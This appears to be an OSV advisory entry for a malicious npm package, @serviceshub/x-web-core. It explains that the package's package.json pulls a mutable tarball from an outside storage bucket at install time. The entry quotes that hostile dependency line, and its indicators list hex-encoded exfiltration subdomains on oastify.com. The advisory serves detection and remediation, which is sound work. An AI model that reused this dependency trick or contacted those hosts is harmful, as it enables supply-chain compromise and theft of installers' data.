MAL-2026-4440

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@serviceshub/x-web-core/MAL-2026-4440.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4440
Aliases
  • GHSA-xjvj-r6v9-q99q
Published
2026-05-20T02:47:14Z
Modified
2026-06-11T15:31:31.171163016Z
Summary
Malicious code in @serviceshub/x-web-core (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (1cd81c2623e8f621801dcbfbf7d7eb8745bf702f1d5e85e410872400c7d2eea7)

Package ships a trivial index.js (module.exports = {};) and exists solely to pull a direct-URL tarball dependency at install time. package.json line 9 declares "ltidisafe": "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-2.3.9.tgz" — an unpinned (no integrity hash, mutable bucket object) tarball hosted outside the npm registry, bypassing registry-side audit. The bucket path literally contains the string depenconf (dependency-confusion). On npm install, npm fetches the GCS tarball and runs any lifecycle scripts inside it on the installer's machine; the author can swap the tarball bytes at any time. Corroborating signals: version is squatted at 99.9.1 for a brand-new scope, description and author fields are empty, and the main module has no functionality matching the package's x-web-core name. The package itself is a lure whose only effect on install is to pull attacker-controlled, non-registry, mutable code into the installer's dependency tree.

Source: ghsa-malware (3932a06bad458dfdf36846940f1fa4217108ecda56051c50cb4d2aadf5c597f9)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific 
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-003433",
            "versions": [
                "99.9.1"
            ],
            "sha256": "0879b22919e43b5490e7bff00bb24c4480d480a5567f9af8de9ffa68c52e7721",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T02:47:14Z",
            "import_time": "2026-05-26T05:50:37.988886297Z"
        },
        {
            "id": "IN-MAL-2026-003432",
            "import_time": "2026-05-26T05:50:37.842772535Z",
            "sha256": "1cd81c2623e8f621801dcbfbf7d7eb8745bf702f1d5e85e410872400c7d2eea7",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T02:47:14Z",
            "versions": [
                "99.9.1"
            ]
        },
        {
            "id": "GHSA-xjvj-r6v9-q99q",
            "ranges": [
                {
                    "type": "SEMVER",
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ]
                }
            ],
            "import_time": "2026-06-11T15:26:36.971985859Z",
            "sha256": "3932a06bad458dfdf36846940f1fa4217108ecda56051c50cb4d2aadf5c597f9",
            "source": "ghsa-malware",
            "modified_time": "2026-06-11T13:54:41Z"
        }
    ]
}
References
Credits

Affected packages

npm / @serviceshub/x-web-core

Package

Name
@serviceshub/x-web-core
View open source insights on deps.dev
Purl
pkg:npm/%40serviceshub%2Fx-web-core

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected

Affected versions

99.*
99.9.1

Database specific

cwes 
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators 
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "9992540e5308f2aed86ce0ce9e57f7a823ba9057414824fc1b44facc1d19a08a",
            "tlsh": "63e07d20066156338ec510b14c2b541bf3b08e4f0444bc0c5feb041c428df7328f939c"
        }
    ],
    "package_integrity": [
        {
            "filename": "x-web-core-99.9.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-3vNUdgaAooWdFAu3x4qMHxQE4FSk12yzklc4Wmp+xbROt1tVEVJThv0rv+9Sj8JwH/ojHK6rGUo5HCscG2ilWw==",
                "sha1": "954d3abcef6abb2bc885364bd3ac5e9d2896e7ad"
            }
        }
    ],
    "domains": [
        "ltidi.storage.googleapis.com",
        "7363616e.serviceshub-x-web-core.t93gb6z6ex32oi5mu5odme1uilocf05ou.oastify.com",
        "7363616e2d643861623737663231633664.serviceshub-x-web-core.t93gb6z6ex32oi5mu5odme1uilocf05ou.oastify.com",
        "2f686f6d652f7363616e.serviceshub-x-web-core.t93gb6z6ex32oi5mu5odme1uilocf05ou.oastify.com"
    ]
}
source 
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@serviceshub/x-web-core/MAL-2026-4440.json"